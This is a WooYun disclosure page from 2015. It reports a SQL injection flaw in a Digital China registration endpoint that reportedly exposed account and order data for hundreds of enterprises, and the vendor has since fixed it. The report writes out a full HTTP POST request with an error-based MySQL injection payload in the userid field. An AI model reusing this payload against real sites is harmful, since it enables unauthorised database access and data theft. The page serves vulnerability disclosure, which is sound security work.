当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138621

漏洞标题:神州数码某系统SQL注入(影响800多家企业\包括京东\沃尔玛等)

相关厂商:digitalchina.com

漏洞作者: 深度安全实验室

提交时间:2015-09-02 15:45

修复时间:2015-09-06 12:22

公开时间:2015-09-06 12:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-02: 细节已通知厂商并且等待厂商处理中
2015-09-02: 厂商已经确认,细节仅向厂商公开
2015-09-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

如题

详细说明:

dckf.digitalchina.com/index.php/point/register,其中参数userid和username均存在注入。
以userid为例

POST /index.php/point/register HTTP/1.1
Content-Length: 538
Content-Type: application/x-www-form-urlencoded
Host: dckf.digitalchina.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=save&address=3137%20Laguna%20Street&company=Acunetix&email=sample%40email.tst&fax=317-317-3137&newpassword=g00dPa%24%24w0rD&password=g00dPa%24%24w0rD&pc=1&realname=cdsmilvv&sign=1&tel=1&userid='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(78)%2cCHAR(68)%2cCHAR(67)%2cCHAR(55)%2cCHAR(75)%2cCHAR(109)%2cCHAR(81)%2cCHAR(71))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&username=cdsmilvv

0902-11.jpg


漏洞证明:

0902-22.jpg


800多家企业账号泄露

0902-44.jpg

0902-33.jpg


京东、沃尔玛、中移等企业的订单信息

0902-55.jpg

0902-66.jpg


修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-02 16:18

厂商回复:

尽快处理

最新状态:

2015-09-06:已修复